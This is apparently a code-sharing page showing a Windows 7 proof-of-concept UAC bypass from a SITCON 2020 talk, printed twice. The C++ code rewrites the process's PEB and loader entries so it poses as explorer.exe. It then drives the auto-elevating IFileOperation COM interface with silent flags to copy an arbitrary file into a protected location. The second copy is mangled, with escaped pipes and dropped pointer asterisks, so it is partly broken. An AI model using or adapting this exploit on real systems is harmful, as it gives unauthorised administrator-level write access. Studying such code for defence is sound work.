aaaddress1 · May 3, 2024 22:09
diff --git a/sysDoor.c b/sysDoor.c
 //
 // SITCON 2020 PoC for Windows 7 x86
 // Author: [email protected]
 // cite: github.com/liuxigu/bypassuac/blob/master/bypassuac/bypassuac.cpp
 //
 #include <Shobjidl.h>
 #include "windows.h"
 #include "winternl.h"
 #include <iostream>
 using namespace std;

 PPEB fn_get_peb_via_NtQueryInformationProcess() {
 	typedef NTSTATUS(WINAPI *NtQueryInformationProcess)(HANDLE, DWORD, PVOID, ULONG, PULONG);
 	DWORD dwProcessId = GetCurrentProcessId();
 	PROCESS_BASIC_INFORMATION processInfo;
 	PPEB ppeb = NULL;

 	HMODULE hLoadDll = LoadLibrary(L"ntdll.dll");
 	NtQueryInformationProcess ntqip = (NtQueryInformationProcess)GetProcAddress(hLoadDll, "NtQueryInformationProcess");
 	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);


 	if (hProcess != NULL) {

 		NTSTATUS status = ntqip(hProcess, ProcessBasicInformation, &processInfo, sizeof(PROCESS_BASIC_INFORMATION), NULL);
 		if (NT_SUCCESS(status)) {

 			ppeb = processInfo.PebBaseAddress;

 		}
 		else {
 			CloseHandle(hProcess);
 			return FALSE;
 		}
 	}
 	CloseHandle(hProcess);
 	return ppeb;
 }



 VOID fn_change_ProcessParameters_and_LDR(PUNICODE_STRING name, LPCWSTR lpExplorePath) {
 	typedef VOID(WINAPI *RtlInitUnicodeString)(_Inout_  PUNICODE_STRING DestinationString, _In_opt_ PCWSTR SourceString);
 	RtlInitUnicodeString pfnRtlInitUnicodeString = NULL;


 	HMODULE hDll = LoadLibrary(L"ntdll.dll");
 	pfnRtlInitUnicodeString = (RtlInitUnicodeString)GetProcAddress(hDll, "RtlInitUnicodeString");


 	pfnRtlInitUnicodeString(name, lpExplorePath);
 	// same initial UnicodeString length and MaximumLength.
 }


 int wmain(int argc, WCHAR** argv) {
 	int nArgs = 0;
 	LPWSTR *lpParam = NULL;
 	LPWSTR lpExplorePath = new WCHAR[MAX_PATH];

 	HRESULT hr = NULL;
 	PPEB ppeb = NULL;
 	DWORD *dwpFullDllName = NULL, *dwpBaseDllName = NULL;
 	GetWindowsDirectory(lpExplorePath, MAX_PATH);
 	lstrcat(lpExplorePath, L"\\explorer.exe");
 	ppeb = fn_get_peb_via_NtQueryInformationProcess();

 	__asm {
 		pushad
 		mov eax, fs:[0x30]		// PEB
 		mov eax, [eax + 0x0c]   // LDR  
 		mov eax, [eax + 0x0c]   // InLoadOrderModuleList.Flink  -> LDR_DATA_TABLE_ENTRY.InLoadOrderLinks
 		add eax, 0x24			// FullDllName
 		mov dwpFullDllName, eax
 		sub eax, 0x24
 		add eax, 0x2c			// BaseDllName
 		mov dwpBaseDllName, eax
 		popad
 	}
 	fn_change_ProcessParameters_and_LDR(&ppeb->ProcessParameters->ImagePathName, lpExplorePath);
 	fn_change_ProcessParameters_and_LDR(&ppeb->ProcessParameters->CommandLine, lpExplorePath);
 	fn_change_ProcessParameters_and_LDR((PUNICODE_STRING)((unsigned char *)dwpFullDllName), lpExplorePath);
 	fn_change_ProcessParameters_and_LDR((PUNICODE_STRING)((unsigned char *)dwpBaseDllName), L"explorer.exe");

 	if (argc == 1) {
 		wcout << "usage: " << argv[0] << " [path/to/file] [where/to/write]" << endl;
 		return 0;
 	}

 	IFileOperation *fileOperation = NULL;
 	LPCWSTR destPath = argv[2];
 	LPCWSTR path = argv[1];
 	LPCWSTR filename = &path[wstring(path).find_last_of('\\') + 1];
 	hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
 	if (SUCCEEDED(hr)) {
 		hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&fileOperation));
 		if (SUCCEEDED(hr)) {
 			hr = fileOperation->SetOperationFlags(
 				FOF_NOCONFIRMATION |
 				FOF_SILENT |
 				FOFX_SHOWELEVATIONPROMPT |
 				FOFX_NOCOPYHOOKS |
 				FOFX_REQUIREELEVATION |
 				FOF_NOERRORUI);
 			if (SUCCEEDED(hr)) {
 				IShellItem *from = NULL, *to = NULL;
 				hr = SHCreateItemFromParsingName(path, NULL, IID_PPV_ARGS(&from));
 				if (SUCCEEDED(hr)) {
 					if (destPath)
 						hr = SHCreateItemFromParsingName(destPath, NULL, IID_PPV_ARGS(&to));
 					if (SUCCEEDED(hr)) {
 						hr = fileOperation->CopyItem(from, to, filename, NULL);
 						if (NULL != to)
 							to->Release();
 					}
 					from->Release();
 				}
 				if (SUCCEEDED(hr)) {
 					hr = fileOperation->PerformOperations();
 				}
 			}
 			fileOperation->Release();
 		}
 		CoUninitialize();
 	}
 	return 0;
 }
	//
	// SITCON 2020 PoC for Windows 7 x86
	// Author: [email protected]
	// cite: github.com/liuxigu/bypassuac/blob/master/bypassuac/bypassuac.cpp
	//
	#include <Shobjidl.h>
	#include "windows.h"
	#include "winternl.h"
	#include <iostream>
	using namespace std;

	PPEB fn_get_peb_via_NtQueryInformationProcess() {
	typedef NTSTATUS(WINAPI *NtQueryInformationProcess)(HANDLE, DWORD, PVOID, ULONG, PULONG);
	DWORD dwProcessId = GetCurrentProcessId();
	PROCESS_BASIC_INFORMATION processInfo;
	PPEB ppeb = NULL;

	HMODULE hLoadDll = LoadLibrary(L"ntdll.dll");
	NtQueryInformationProcess ntqip = (NtQueryInformationProcess)GetProcAddress(hLoadDll, "NtQueryInformationProcess");
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);


	if (hProcess != NULL) {

	NTSTATUS status = ntqip(hProcess, ProcessBasicInformation, &processInfo, sizeof(PROCESS_BASIC_INFORMATION), NULL);
	if (NT_SUCCESS(status)) {

	ppeb = processInfo.PebBaseAddress;

	}
	else {
	CloseHandle(hProcess);
	return FALSE;
	}
	}
	CloseHandle(hProcess);
	return ppeb;
	}



	VOID fn_change_ProcessParameters_and_LDR(PUNICODE_STRING name, LPCWSTR lpExplorePath) {
	typedef VOID(WINAPI *RtlInitUnicodeString)(_Inout_ PUNICODE_STRING DestinationString, _In_opt_ PCWSTR SourceString);
	RtlInitUnicodeString pfnRtlInitUnicodeString = NULL;


	HMODULE hDll = LoadLibrary(L"ntdll.dll");
	pfnRtlInitUnicodeString = (RtlInitUnicodeString)GetProcAddress(hDll, "RtlInitUnicodeString");


	pfnRtlInitUnicodeString(name, lpExplorePath);
	// same initial UnicodeString length and MaximumLength.
	}


	int wmain(int argc, WCHAR** argv) {
	int nArgs = 0;
	LPWSTR *lpParam = NULL;
	LPWSTR lpExplorePath = new WCHAR[MAX_PATH];

	HRESULT hr = NULL;
	PPEB ppeb = NULL;
	DWORD dwpFullDllName = NULL, dwpBaseDllName = NULL;
	GetWindowsDirectory(lpExplorePath, MAX_PATH);
	lstrcat(lpExplorePath, L"\\explorer.exe");
	ppeb = fn_get_peb_via_NtQueryInformationProcess();

	__asm {
	pushad
	mov eax, fs:[0x30] // PEB
	mov eax, [eax + 0x0c] // LDR
	mov eax, [eax + 0x0c] // InLoadOrderModuleList.Flink -> LDR_DATA_TABLE_ENTRY.InLoadOrderLinks
	add eax, 0x24 // FullDllName
	mov dwpFullDllName, eax
	sub eax, 0x24
	add eax, 0x2c // BaseDllName
	mov dwpBaseDllName, eax
	popad
	}
	fn_change_ProcessParameters_and_LDR(&ppeb->ProcessParameters->ImagePathName, lpExplorePath);
	fn_change_ProcessParameters_and_LDR(&ppeb->ProcessParameters->CommandLine, lpExplorePath);
	fn_change_ProcessParameters_and_LDR((PUNICODE_STRING)((unsigned char *)dwpFullDllName), lpExplorePath);
	fn_change_ProcessParameters_and_LDR((PUNICODE_STRING)((unsigned char *)dwpBaseDllName), L"explorer.exe");

	if (argc == 1) {
	wcout << "usage: " << argv[0] << " [path/to/file] [where/to/write]" << endl;
	return 0;
	}

	IFileOperation *fileOperation = NULL;
	LPCWSTR destPath = argv[2];
	LPCWSTR path = argv[1];
	LPCWSTR filename = &path[wstring(path).find_last_of('\\') + 1];
	hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED \| COINIT_DISABLE_OLE1DDE);
	if (SUCCEEDED(hr)) {
	hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&fileOperation));
	if (SUCCEEDED(hr)) {
	hr = fileOperation->SetOperationFlags(
	FOF_NOCONFIRMATION \|
	FOF_SILENT \|
	FOFX_SHOWELEVATIONPROMPT \|
	FOFX_NOCOPYHOOKS \|
	FOFX_REQUIREELEVATION \|
	FOF_NOERRORUI);
	if (SUCCEEDED(hr)) {
	IShellItem from = NULL, to = NULL;
	hr = SHCreateItemFromParsingName(path, NULL, IID_PPV_ARGS(&from));
	if (SUCCEEDED(hr)) {
	if (destPath)
	hr = SHCreateItemFromParsingName(destPath, NULL, IID_PPV_ARGS(&to));
	if (SUCCEEDED(hr)) {
	hr = fileOperation->CopyItem(from, to, filename, NULL);
	if (NULL != to)
	to->Release();
	}
	from->Release();
	}
	if (SUCCEEDED(hr)) {
	hr = fileOperation->PerformOperations();
	}
	}
	fileOperation->Release();
	}
	CoUninitialize();
	}
	return 0;
	}